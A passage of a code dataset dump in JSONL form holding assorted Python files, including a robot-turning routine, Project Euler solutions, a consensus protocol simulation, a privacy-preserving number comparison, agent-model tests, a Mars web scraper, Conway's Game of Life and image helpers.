400), (-45, 400), (-60, 20), (-75, 10), (-90, 100)] ############ test ############\n self.curr_points = self._LT_threshold(curr_angle_dist)\n print(self.ref_points)\n print(self.curr_points)\n\n if is_turn_left == True:\n lhs = self.curr_points\n rhs = self.ref_points\n else:\n lhs = self.ref_points\n rhs = self.curr_points\n\n ideal_del_i = (abs(self.del_dir) * round(45/FINE_TUNE_STEP_SIZE)) #del_dir = 1 -> 45 degree, displacement = 45/15 = 3\n relevance_list = []\n for del_i in range( ideal_del_i - self.tune_range, ideal_del_i + self.tune_range + 1):\n relevance = self._cal_relevance(lhs, rhs, del_i)\n #relevance -= math.sqrt(abs(del_i - ideal_del_i)) ##### test #####\n relevance_list.append(relevance)\n print(relevance_list)\n fine_tune_displacement = self._get_fine_tune_displacement(relevance_list)\n \n if is_turn_left:\n fine_tune_degree = (-1)*fine_tune_displacement*FINE_TUNE_STEP_SIZE\n else:\n fine_tune_degree = fine_tune_displacement*FINE_TUNE_STEP_SIZE\n print(\"fine tune \" + str(fine_tune_degree) + \" degree\")\n \n # fine_tune_displacement > 0 means overturned, need turn back\n if (is_turn_left and fine_tune_displacement > 0) or (not is_turn_left and fine_tune_displacement < 0):\n fc.turn_right(FINE_TUNE_PWR)\n else:\n fc.turn_left(FINE_TUNE_PWR)\n time.sleep(FINE_TUNE_TIME * abs(fine_tune_displacement))\n fc.stop() \n\n def _LT_threshold(self, target_list):\n res = []\n for angle, dist in target_list:\n if dist >= THRESHOLD:\n res.append(0)\n else:\n res.append(1)\n return res\n\n def _cal_relevance(self, lhs, rhs, del_i):\n rel = 0\n list_len = len(lhs)\n for i in range(list_len - del_i):\n if lhs[del_i + i] == rhs[i]:\n rel += 1\n else:\n rel -= 0.5\n\n return rel\n\n def _get_fine_tune_displacement(self, relevance_list):\n max_relevance_index = self.tune_range\n max_relevance = relevance_list[self.tune_range]\n for i in range(2*self.tune_range + 1):\n if relevance_list[i] > max_relevance:\n max_relevance_index = i\n max_relevance = relevance_list[i]\n return max_relevance_index - self.tune_range\n","sub_path":"lab1_code/fineTuneOrient.py","file_name":"fineTuneOrient.py","file_ext":"py","file_size_in_byte":3890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"8366962","text":"#!/usr/bin/env python3\n\"\"\"\nLaunch a python shell\n\nTry to launch ipthon or bpython. Fall back to the\nstandard python interpreter.\n\"\"\"\n\nimport services\n\n\ndef start_ipython(user_ns={}):\n \"\"\"Start the ipython shell\"\"\"\n from IPython import start_ipython\n start_ipython(argv=[], user_ns=user_ns)\n\n\ndef start_bpython(locals_={}):\n \"\"\"Start the bpython shell\"\"\"\n from bpython import embed\n embed(locals_=locals_)\n\n\ndef start_fallback(local={}):\n \"\"\"Start the fallback interpreter\"\"\"\n from code import interact\n interact(local=local)\n\n\ndef start_shell(local={}):\n \"\"\"\n Start a python shell\n \"\"\"\n shells = [start_ipython, start_bpython, start_fallback]\n for shell in shells:\n try:\n shell(local)\n except ImportError:\n pass # try next\n else:\n return\n\n\ndef console(args):\n \"\"\"\n Start the API console\n \"\"\"\n host = \"localhost:2344\"\n\n services.init(host)\n start_shell(services.__dict__)\n\n\nif __name__ == \"__main__\":\n console(None)\n","sub_path":"console/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"336197813","text":"from functools import lru_cache\r\n\r\ndef korita(n, m, l):\r\n if n == 0:\r\n return 0\r\n if l > n: \r\n return 0\r\n counter = 0\r\n if m * (l + 1) <= n:\r\n counter += 1 + korita(n - m, m - 1, l)\r\n return counter\r\n\r\nprint(korita(9, 3, 2))","sub_path":"vaje/korita.py","file_name":"korita.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"359784935","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nimport itertools\n\ndef consists_of(n, digits):\n return sorted(n) == map(str, digits)\n\ndef sum_of_fifths_pow_str(digits):\n res = str(sum(map(lambda x:x**5, digits)))\n res = (6-len(res))*'0' + res\n return res\n\ndef main():\n result = 0\n digits = range(10)*6\n for d in itertools.combinations_with_replacement(range(10), r=6):\n val = sum_of_fifths(d)\n if consists_of(val, d):\n print(d, val)\n result += int(val)\n print(result-1)\n\nif __name__ == '__main__':\n main()\n","sub_path":"pe_30.py","file_name":"pe_30.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"114584656","text":"#coding=utf-8\n\n\"\"\"\nvalid_keys 表示 json keys 映射到 t_shixin_valid 相应的columns\n\nvalid_columns 对应 t_shixin_valid 的columns\ninvalid_columns 对应 t_shixin_invalid 的columns\n\"\"\"\n\nvalid_keys = {\n 'id': 'sys_id',\n 'iname': 'name',\n 'age': 'age',\n 'sexy': 'sex',\n 'cardNum':'card_num',\n 'businessEntity': 'business_entity',\n 'areaName': 'area_name',\n 'caseCode': 'case_code',\n 'regDate': 'reg_date',\n 'publishDate': 'publish_date',\n 'gistId': 'gist_id',\n 'courtName': 'court_name',\n 'gistUnit': 'gist_unit',\n 'duty': 'duty',\n 'performance': 'performance',\n 'disruptTypeName': 'disrupt_type_name',\n 'partyTypeName': 'party_type_name'\n}\n\nvalid_columns = valid_keys.values()\nvalid_columns.append('flag')\n\ninvalid_columns = ('sys_id', 'err_type')\n\n\n","sub_path":"current/shixin_spider/configuration/columns_cfg.py","file_name":"columns_cfg.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"39962972","text":"def mymax(a, b):\n if a > b:\n return a\n else:\n return b\n\n\ndef test_mymax(test_data, test_result, test_id):\n if mymax(test_data[0], test_data[1]) == test_result:\n print(\"%s is correct\" % test_id)\n else:\n print(\"%s failed!\" % test_id)\n\n\nif __name__ == '__main__':\n lista1 = [1, 5]\n lista2 = [6, 1]\n lista3 = [10, 10]\n\n test_mymax(lista1, 5, \"Test 1\")\n test_mymax(lista2, 6, \"Test 2\")\n test_mymax(lista3, 10, \"Test 3\")\n","sub_path":"simple46exercises/simple/zadanie1.py","file_name":"zadanie1.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"350265479","text":"from Messages.Message import Message\n\n\nclass BOSCO:\n\n name = \"BOSCO Protocol\"\n\n def __init__(self, **kargs):\n self.env = kargs[\"env\"]\n self.pki = kargs[\"pki\"]\n self.pki.register(self)\n self.input = None\n\n def run_node(self):\n round = self.env.get_round()\n myid = self.env.get_id(self)\n flag = 0\n if round == 0:\n self.input = self.env.get_input(myid)\n self.env.put_broadcast(self, self.pki.sign(\n self, Message(myid, self.input)))\n else:\n if flag:\n self.env.get_input_msgs(self)\n self.env.put_broadcast(self, self.pki.sign(\n self, Message(myid, self.input)))\n else:\n msgs = self.env.get_input_msgs(self)\n d = {}\n for msg in msgs:\n if(not self.pki.verify(msg)):\n raise RuntimeError\n key = msg.get_extraction()\n if key not in d:\n d[key] = 0\n d[key] = d[key]+1\n if not d:\n raise RuntimeError\n d_sorted = sorted(\n d.items(), key=lambda kv: kv[1], reverse=True)\n if(d_sorted[0][1] >= (self.env.get_n()-self.env.get_f())):\n self.env.put_output(self, d_sorted[0][0])\n self.input = d_sorted[0][0]\n self.env.put_broadcast(self, self.pki.sign(\n self, Message(myid, self.input)))\n elif (d_sorted[0][1] > (self.env.get_n()-self.env.get_f())/2):\n if len(d_sorted) > 1 and d_sorted[1][1] > (self.env.get_n()-self.env.get_f())/2:\n self.env.put_broadcast(self, self.pki.sign(\n self, Message(myid, self.input)))\n else:\n self.input = d_sorted[0][0]\n self.env.put_broadcast(self, self.pki.sign(\n self, Message(myid, self.input)))\n","sub_path":"src/Protocols/BOSCO.py","file_name":"BOSCO.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"119161242","text":"\n# disclaimer: this code was written for testing and self-learning, do\n# not use in any serious application, do not expect any serious security!\nimport socket, sys, logging, hashlib, random, json, sympy, pickle\n\n# global settings - make sure those are consistent\nNBITS=32 # increase this is comparing worth with Jeff Bezos or Mark Zuckerberg\n\n# we work modulo this prime\nP = (1<<510)+15 # yes it happens to be prime\n\nSECURITY=512\n\n# setup logging\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s: %(message)s')\nLOG = logging.getLogger(__name__)\n\n# utility - wait for connection on port, or connect to host:port\ndef interact(info):\n info = info.split(':')\n\n if len(info) == 1:\n port = int(info[0])\n LOG.info('listening on port %d', port)\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n sock.bind( ('localhost', port) )\n sock.listen(1)\n connection, client_address = sock.accept()\n LOG.info('Client connected from %s', client_address)\n\n return connection\n\n else:\n host, port = info[0], int(info[1])\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n LOG.info('connecting to %s:%d', host, port)\n sock.connect( (host,port) )\n LOG.info('connected!')\n return sock\n\n\n# compute 'ups', they are values that are bigger than a, and will intercept a bigger value of the other party\n# for each i, if the i-th bit is 0, set it to 1 and clear lower bits\ndef s_up(a, n=NBITS):\n return { (a - (a & ((1<>i) & 1 == 0 }\n\n# compute 'downs', they are values that are smaller than a, and will intercept a smaller value of the other party\n# for each i, if the i-th bit is 1, clear lower bits\ndef s_down(a, n=NBITS):\n return { (a - (a & ((1<>i) & 1 == 1 }\n\n# random integer of 512 bits\ndef rand512():\n return random.getrandbits(512)\n\n# return the sha512, as an integer\ndef sha512(s):\n return int.from_bytes(hashlib.sha512(s.encode()).digest(), byteorder='big')\n\ndef hashes(s, n=NBITS):\n return [*(sha512(str(x)) for x in s), *(rand512() for i in range(n-len(s)))]\n\n\n# compute x^e, b y repeated squaring, modulo p\ndef modpow(x, e, p=P):\n r, t = ((x % p) if (e & 1) else 1), x\n e >>= 1\n while e:\n t = (t * t) % p\n if e & 1:\n r = (r * t) % p\n e >>= 1\n return r\n\n# compute a number relatively prime to b, that is,\n# a number r so that r, b have no common factor\ndef rand_coprime(b):\n while True:\n r = random.randint(b // 4, b)\n if sympy.gcd(r, b) == 1:\n return r\n\nif len(sys.argv) != 3:\n print('Usage: prog.py number_to_compare [host:]port (if host is specified connect, otherwise listen and wait)')\n sys.exit()\n \nval = int(sys.argv[1])\nif (val >> NBITS) != 0:\n print('Congratulations, you own many billions, and', NBITS, 'bits are not enough for you!')\n print('You will have to up the NBITS parameter, and the other party too for this to work.')\n sys.exit()\n\nLOG.info('will compare the provided value with a private remote number')\n\nLOG.info('computing my downs/ups, plus padding to hide their sizes')\nmy_downs = hashes(s_down(val))\nmy_ups = hashes(s_up(val))\n\nLOG.info('generating a private key')\nmy_key = rand_coprime(P-1)\n\nLOG.info('encrypting and shuffling my downs/ups')\nM_my_downs = [modpow(x, my_key) for x in my_downs]\nM_my_ups = [modpow(x, my_key) for x in my_ups]\nrandom.shuffle(M_my_downs)\nrandom.shuffle(M_my_ups)\n\n# listen or connect to host:port\nc = interact(sys.argv[2])\n\nLOG.info('sending my downs/ups encrypted with my key...')\nc.sendall(pickle.dumps([M_my_downs, M_my_ups]))\nH_his_downs, H_his_ups = pickle.loads(c.recv(2*SECURITY*NBITS//8*3))\nLOG.info('...received his downs/ups encrypted with his key')\n\nLOG.info('bi-encrypting (with my key) and shuffling his downs/ups')\nHM_his_downs = [modpow(x, my_key) for x in H_his_downs]\nHM_his_ups = [modpow(x, my_key) for x in H_his_ups]\nrandom.shuffle(HM_his_downs)\nrandom.shuffle(HM_his_ups)\n\nLOG.info('sending his bi-encrypted downs/ups...')\nc.sendall(pickle.dumps([HM_his_downs, HM_his_ups]))\nHM_my_downs, HM_my_ups = pickle.loads(c.recv(2*SECURITY*NBITS//8*3))\nLOG.info('...received my bi-encrypted downs/ups')\n\nLOG.info('n. insections of my_downs and his_ups: %d (is my_value > his_value?)',\n len(set(HM_my_downs) & set(HM_his_ups)))\nLOG.info('n. insections of my_ups and his_downs: %d (is his_value > my_value?)',\n len(set(HM_my_ups) & set(HM_his_downs)))\n","sub_path":"millionaires_old.py","file_name":"millionaires_old.py","file_ext":"py","file_size_in_byte":4601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"446337392","text":"import pytest\r\nimport agentpy as ap\r\nimport numpy as np\r\n\r\n\r\ndef test_repr():\r\n model = ap.Model()\r\n model.add_agents()\r\n model.add_env()\r\n assert model.agents.__repr__() == \"AgentList [1 agent]\"\r\n assert model.envs.__repr__() == \"EnvList [1 environment]\"\r\n assert model.objects.__repr__() == \"ObjList [2 objects]\"\r\n l1 = model.agents.id\r\n l2 = l1 + 1\r\n assert l1.__repr__() == \"AttrList of 'id': [1]\"\r\n assert l2.__repr__() == \"AttrList: [2]\"\r\n\r\n\r\ndef test_call():\r\n class MyAgent(ap.Agent):\r\n def method(self):\r\n if self.id == 2:\r\n self.model.agents[2].delete()\r\n self.model.called.append(self.id)\r\n\r\n model = ap.Model()\r\n model.called = []\r\n model.add_agents(4, MyAgent)\r\n model.agents.call('method', check_alive=True)\r\n assert model.called == [1, 2, 4]\r\n\r\n model = ap.Model()\r\n model.called = []\r\n model.add_agents(4, MyAgent)\r\n model.agents.method()\r\n assert model.called == [1, 2, 3, 4]\r\n\r\n\r\ndef test_attr_calls():\r\n model = ap.Model()\r\n model.add_agents(2)\r\n model.agents.x = 1\r\n model.agents.f = lambda: 2\r\n assert list(model.agents.x) == [1, 1]\r\n assert list(model.agents.f()) == [2, 2]\r\n with pytest.raises(AttributeError):\r\n assert list(model.agents.y) # Convert to list to call attribute\r\n with pytest.raises(TypeError):\r\n assert model.agents.x() # noqa\r\n\r\n\r\ndef test_select():\r\n \"\"\" Select subsets with boolean operators. \"\"\"\r\n model = ap.Model()\r\n model.add_agents(3)\r\n selection1 = model.agents.id == 2\r\n selection2 = model.agents.id != 2\r\n selection3 = model.agents.id < 2\r\n selection4 = model.agents.id > 2\r\n selection5 = model.agents.id <= 2\r\n selection6 = model.agents.id >= 2\r\n assert selection1 == [False, True, False]\r\n assert selection2 == [True, False, True]\r\n assert selection3 == [True, False, False]\r\n assert selection4 == [False, False, True]\r\n assert selection5 == [True, True, False]\r\n assert selection6 == [False, True, True]\r\n assert list(model.agents.select(selection1).id) == [2]\r\n\r\n\r\ndef test_random():\r\n \"\"\" Test random shuffle and selection. \"\"\"\r\n model = ap.Model()\r\n model.add_agents(2)\r\n assert len(model.agents) == len(model.agents.shuffle())\r\n assert len(model.agents.random()) == 1\r\n\r\n # Custom generator with seperate seed\r\n model = ap.Model()\r\n model.add_agents(5)\r\n generator = np.random.default_rng(1)\r\n assert len(model.agents.random(generator=generator)) == 1\r\n assert model.agents.random(generator=generator).id[0] == 3\r\n assert list(model.agents.shuffle(generator=generator).id) == [5, 1, 3, 2, 4]\r\n\r\n # Test with single agent\r\n model = ap.Model()\r\n agents = model.add_agents(1)\r\n assert model.agents.random()[0] is agents[0]\r\n assert model.agents.shuffle()[0] is agents [0]\r\n\r\n # Agentlist with no model defined directly\r\n model = ap.Model()\r\n agents = model.add_agents(3)\r\n agents = ap.AgentList(agents)\r\n model.run(steps=0, seed=1, display=False)\r\n assert agents.random()[0].id == 2\r\n\r\n # Agentlist with no model defined\r\n # (no seed control without model, test can only check if no errors)\r\n agents1 = ap.AgentList([1, 2, 3])\r\n agents1.random()\r\n\r\n\r\ndef test_sort():\r\n \"\"\" Test sorting method. \"\"\"\r\n model = ap.Model()\r\n model.add_agents(2)\r\n model.agents[0].x = 1\r\n model.agents[1].x = 0\r\n model.agents.sort('x')\r\n assert list(model.agents.x) == [0, 1]\r\n assert list(model.agents.id) == [2, 1]\r\n\r\n\r\ndef test_arithmetics():\r\n \"\"\" Test arithmetic operators \"\"\"\r\n\r\n model = ap.Model()\r\n model.add_agents(3)\r\n agents = model.agents\r\n\r\n agents.x = 1\r\n assert agents.x.attr == \"x\"\r\n assert list(agents.x) == [1, 1, 1]\r\n\r\n agents.y = ap.AttrList([1, 2, 3])\r\n assert list(agents.y) == [1, 2, 3]\r\n\r\n agents.x = agents.x + agents.y\r\n assert list(agents.x) == [2, 3, 4]\r\n\r\n agents.x = agents.x - ap.AttrList([1, 1, 1])\r\n assert list(agents.x) == [1, 2, 3]\r\n\r\n agents.x += 1\r\n assert list(agents.x) == [2, 3, 4]\r\n\r\n agents.x -= 1\r\n assert list(agents.x) == [1, 2, 3]\r\n\r\n agents.x *= 2\r\n assert list(agents.x) == [2, 4, 6]\r\n\r\n agents.x = agents.x * agents.x\r\n assert list(agents.x) == [4, 16, 36]\r\n\r\n agents.x = agents.x / agents.x\r\n assert list(agents.x)[0] == pytest.approx(1.)\r\n\r\n agents.x /= 2\r\n assert list(agents.x)[0] == pytest.approx(0.5)\r\n","sub_path":"tests/test_lists.py","file_name":"test_lists.py","file_ext":"py","file_size_in_byte":4466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"56057105","text":"# A positive fraction whose numerator is less than its denominator is\n# called a proper fraction.\n# For any denominator, d, there will be d−1 proper fractions; for example,\n# with d = 12:\n# 1/12, 2/12, 3/12, 4/12, 5/12, 6/12, 7/12, 8/12, 9/12, 10/12, 11/12.\n# \n# We shall call a fraction that cannot be cancelled down a resilient fraction.\n# Furthermore we shall define the resilience of a denominator, R(d), to be the\n# ratio of its proper fractions that are resilient; for example, R(12) = 4/11.\n# In fact, d = 12 is the smallest denominator having a resilience R(d) < 4/10.\n# \n# Find the smallest denominator d, having a resilience R(d) < 15499/94744.\n\n# THEORY:\n# \n# If phi(n) is Euler's totient function, then R(d) = phi(d) / (d - 1).\n# If d = p1 * p2 * p3 * ... * pk, with all primes p distinct,\n# then R(d) = ((p1 - 1) * ... * (pk - 1)) / ((p1 * ... * pk) - 1).\n# Multiplying d by a prime p that it's already divisible by results in the\n# numerator and the left half of the denominator both being multiplied by p.\n# \n# This means that to minimize R(d), d should first be set equal to a product\n# of distinct primes D, and then be set equal to multiples of D until the -1\n# in the denominator ceases to be significant.\n\nfrom time import time\nimport sys\nsys.path.append(\"../Library\")\nfrom peresult import peresult\nfrom primefns import primesbelow\n\ndef solve(cap = 15499/94744):\n start = time()\n primes = primesbelow(100) # Safe overestimate\n numerator = 1\n n = 1\n for p in primes:\n if (numerator * (p - 1)) / (n * p - 1) > cap:\n numerator *= p - 1\n n *= p\n else:\n for mult in range(1, p):\n if (numerator * mult) / (n * mult - 1) < cap:\n result = n * mult\n break\n break\n else: # Loop fell through. Primes list wasn't long enough\n raise RuntimeError(\"Primes list in code too short. Edit and extend\")\n peresult(243, result, time() - start)\n\nif __name__ == \"__main__\":\n solve()\n","sub_path":"Problems 201-300/pe243Resilience.py","file_name":"pe243Resilience.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"46368736","text":"from splinter import Browser\nfrom bs4 import BeautifulSoup as bs\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport pandas as pd\n\n\ndef init_browser():\n executable_path = {'executable_path': ChromeDriverManager().install()}\n return Browser('chrome', **executable_path, headless=False)\n\n\ndef scrape():\n # ## NASA Mars News\n url = 'https://redplanetscience.com'\n browser = init_browser()\n browser.visit(url)\n html = browser.html\n soup = bs(html, 'html.parser')\n\n results = soup.find_all(\"div\", class_=\"content_title\")\n content_titles = []\n for result in results:\n content_titles.append(result.text)\n\n results = soup.find_all(\"div\", class_=\"article_teaser_body\")\n content_para = []\n for result in results:\n content_para.append(result.text)\n\n content = []\n for i in range(len(results)):\n content.append({'title': content_titles[i], 'para': content_para[i]})\n mongo_collection = {'contents': content,\n 'featured_image_url': '',\n 'hemisphere': ''\n }\n\n# ## JPL Mars Space Images - Featured Image\n\n url = 'https://spaceimages-mars.com/'\n browser.visit(url)\n\n links_found = browser.links.find_by_partial_text('FULL IMAGE')\n for link in links_found:\n print(link[\"href\"])\n featured_image_url = link[\"href\"]\n mongo_collection['featured_image_url'] = featured_image_url\n\n url = 'https://galaxyfacts-mars.com'\n tables = pd.read_html(url)\n\n df = tables[1]\n df.to_html('MarsFacts.html')\n\n # ## Mars Hemispheres\n\n url = 'https://marshemispheres.com/'\n browser.visit(url)\n\n links = browser.links.find_by_partial_text('Hemisphere Enhanced')\n for link in links:\n print(link['href'])\n\n hemisphere_image_urls = []\n for i in range(len(links)):\n browser.links.find_by_partial_text('Hemisphere Enhanced')[i].click()\n link_img = browser.links.find_by_partial_text('Original')\n soup = bs(browser.html, 'html.parser')\n title = soup.find('h2', class_='title').text.replace(\" Enhanced\", \"\")\n hemisphere_image_urls.append(\n {\"title\": title, \"img_url\": link_img[\"href\"]})\n browser.links.find_by_partial_text('Back').click()\n mongo_collection['hemisphere'] = hemisphere_image_urls\n\n return mongo_collection\n","sub_path":"scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"609909755","text":"\"\"\"\nconway.py\nAuthor: Christopher Lee\nCredit: \nAssignment:\nWrite and submit a program that plays Conway's Game of Life, per \nhttps://github.com/HHS-IntroProgramming/Conway-Life\n\"\"\"\n#==================================IMPORTS======================================\nfrom ggame import *\nfrom math import floor\n#==============================COLORS_AND_LINES=================================\nblack = Color(0, 1)\nwhite = Color(0xffffff, 1)\npink = Color(0xFF0097, 1)\nblue = Color(0x00B6FF, 1)\nline = LineStyle(1, white)\nblackline = LineStyle(0.1, black)\nc = {}\ncc = []\n#================================IMPORTANT======================================\n'''gridnumber is the number of cells that there are for each row\nRecommended is 20. Max is 30 before program starts to slow'''\n#gridnumber = 20\ngridnumber = int(input('''How many cells would you like each row to have?\nRecommended is 20 cells.\nMax is 30 cells before program starts to slow.\n'''))\n#Scales screen based on gridnumber\nScreenWidth = gridnumber * 100\nScreenHeight = gridnumber * 100\n#=================================CLASSES=======================================\nclass grid(Sprite):\n g = RectangleAsset(50, 50, blackline, white)\n def __init__(self, position):\n super().__init__(grid.g, position)\n self.visible = True\nclass cell(Sprite):\n cc = RectangleAsset(50, 50, blackline, blue)\n def __init__(self, position):\n super().__init__(cell.cc, position)\n self.visible = False\nclass deadcell(Sprite):\n dc = RectangleAsset(50, 50, blackline, pink)\n def __init__(self, position):\n super().__init__(deadcell.dc, position)\n self.visible = False\n#================================CREATES GRID===================================\ndef row(x):\n xx = x\n y = 0\n for i in range(gridnumber):\n grid((xx, y))\n cell((xx, y))\n deadcell((xx, y))\n y += 50\n#----------------------------------RULES----------------------------------------\ndef rules():\n print('''\nRULES: \n1. Any live cell with fewer than two live neighbors dies, as if by underpopulation.\n\n2. Any live cell with two or three live neighbors lives on to the next generation.\n\n3. Any live cell with more than three live neighbors dies, as if by overpopulation.\n\n4. Any dead cell with exactly three live neighbors becomes a live cell, as if by reproduction.\n\nHOW TO PLAY:\n- Click where you want to add a cell to the grid\n\n- Press R to move to the next generation or start or stop the program\n\n- Press C to reset / clear the grid (not fully working)\n\n- Press S to print the cell's status\n\n- Comment out line 149 and line 151 if you want the steps to be automatic\n''')\n#==============================RUNNING_PROGRAM==================================\nclass map(App):\n def __init__(self, width, height):\n super().__init__(width, height)\n self.go = False\n rules()\n x = 0\n for i in range(gridnumber):\n row(x)\n x += 50\n map.listenKeyEvent('keydown', 'r', self.r)\n map.listenKeyEvent('keydown', 'c', self.c)\n map.listenKeyEvent('keydown', 's', self.s)\n map.listenMouseEvent('click', self.mouse)\n#----------------------------------STEP_FUNC------------------------------------\n def step(self):\n if self.go == True:\n age = 0\n coordlist = []\n for (xc, yc) in cc:\n coordlist.append((xc, yc))\n check = []\n for (xc, yc) in coordlist:\n for x in range(xc - 50, xc + 100, 50):\n if x <= ScreenWidth and x >= 0:\n for y in range(yc - 50, yc + 100, 50):\n if y <= ScreenHeight and y >= 0 and (x, y) not in check:\n check.append((x, y))\n for (xc, yc) in check:\n exist = 0\n neighbor = []\n for x in range(xc - 50, xc + 100, 50):\n if x <= ScreenWidth and x >= 0:\n for y in range(yc - 50, yc + 100, 50):\n if y <= ScreenHeight and y >= 0:\n neighbor.append((x, y))\n neighbor.remove((xc, yc))\n for (xcoord, ycoord) in neighbor:\n if (xcoord, ycoord) in coordlist:\n exist += 1\n if exist == 3 and (xc, yc) not in coordlist:\n c[(xc, yc)] = 'a'\n cell((xc, yc)).visible = True\n cc.append((xc, yc))\n elif (xc, yc) in coordlist:\n if exist == 2 or exist == 3:\n if age % 2 != 0:\n c[(xc, yc)] = 'a'\n cell((xc, yc)).visible = True\n if age % 2 == 0:\n c[(xc, yc)] = 'a'\n deadcell((xc, yc)).visible = True\n else:\n c[(xc, yc)] = 'd'\n grid((xc, yc)).visible = True\n del c[(xc, yc)]\n cc.remove((xc, yc))\n age += 1\n '''\n for coord in c:\n if c[(x, y)] == 'a':\n cell(coord).visible = True\n elif c[(x, y)] == 'd':\n grid(coord).visible = True\n elif c[(x, y)] == 'da':\n c[(x, y)] = 'a'\n cell(coord).visible = True\n '''\n#-------------------------------------vvvv--------------------------------------\n #self.go = False\n#-------------------------------------^^^^--------------------------------------\n #print('Stopping...')\n#-------------------------------MOUSE_CLICK-------------------------------------\n def mouse(self, event):\n if self.go == False:\n x = floor(event.x / 50) * 50\n y = floor(event.y / 50) * 50\n coord = (x, y)\n if x >= 0 and y >= 0 and x < gridnumber * 50 and y < gridnumber * 50:\n c[coord] = 'p'\n if c[coord] == 'a':\n print('test')\n c[coord] = 'd'\n grid(coord).visible = True\n else:\n c[coord] = 'a'\n cc.append(coord)\n cell(coord).visible = True\n#-----------------------------MOVE_TO_NEXT_GEN----------------------------------\n def r(self, event):\n self.go = not self.go\n if self.go == True:\n print('Running...')\n else:\n self.go = False\n print('Stopping...')\n#----------------------------------CLEAR----------------------------------------\n def c(self, event):\n print('Clearing...')\n x = 0\n for i in range(gridnumber):\n row(x)\n x += 50\n c.clear()\n exist = 0\n cc = []\n coordlist = []\n check = []\n neighbor = []\n#-----------------------------------UPDATE--------------------------------------\n def s(self, event):\n if c == {}:\n print('There are no alive cells')\n else:\n print(\"Printing status of cells\")\n print(c)\n print('Done')\n#====================================RUN=======================================\nmyapp = map(ScreenWidth, ScreenHeight)\nmyapp.run()\n","sub_path":"conway.py","file_name":"conway.py","file_ext":"py","file_size_in_byte":7424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"311974393","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nAIM utility functions.\n\"\"\"\n\n\n# ----------------------------------------------------------------------------\n# Imports\n# ----------------------------------------------------------------------------\n\n# Standard library modules\nimport base64\nimport pathlib\nfrom io import BytesIO\n\n# Third-party modules\nfrom PIL import Image\n\n# First-party modules\nfrom deepux1_metrics.ux1.src.core.constants import IMAGE_QUALITY_JPEG\n\n# ----------------------------------------------------------------------------\n# Metadata\n# ----------------------------------------------------------------------------\n\n__author__ = \"Markku Laine\"\n__date__ = \"2020-08-21\"\n__email__ = \"markku.laine@aalto.fi\"\n__version__ = \"1.0\"\n\n\n# ----------------------------------------------------------------------------\n# Utility functions\n# ----------------------------------------------------------------------------\n\n\ndef read_image(filepath: pathlib.Path) -> str:\n \"\"\"\n Read an image from a file.\n\n Args:\n filepath: Input image file path\n\n Returns:\n Image encoded in Base64\n \"\"\"\n with open(filepath, \"rb\") as f:\n image_base64: str = base64.b64encode(f.read()).decode(\"utf-8\")\n\n return image_base64\n\n\ndef write_image(image_base64: str, filepath: pathlib.Path):\n \"\"\"\n Write an image to a file.\n\n Args:\n image_base64: Image encoded in Base64\n filepath: Output image file path\n \"\"\"\n with open(filepath, \"wb\") as f:\n f.write(base64.b64decode(image_base64))\n\n\ndef convert_image(\n png_image: str, jpeg_image_quality: int = IMAGE_QUALITY_JPEG\n) -> str:\n \"\"\"\n Convert an image from PNG to JPEG, encoded in Base64.\n\n (Semi-)transparent pixels are replaced with (semi-)white pixels in\n the output JPEG image.\n\n Args:\n png_image: PNG image encoded in Base64\n\n Kwargs:\n jpeg_image_quality: JPEG image quality (defaults to 70)\n\n Returns:\n JPEG image encoded in Base64\n \"\"\"\n img_rgb: Image.Image = Image.open(\n BytesIO(base64.b64decode(png_image))\n ).convert(\"RGB\")\n buffered: BytesIO = BytesIO()\n img_rgb.save(buffered, format=\"JPEG\", quality=jpeg_image_quality)\n jpeg_image_base64: str = base64.b64encode(buffered.getvalue()).decode(\n \"utf-8\"\n )\n\n return jpeg_image_base64\n","sub_path":"deepux1_metrics/ux1/src/core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
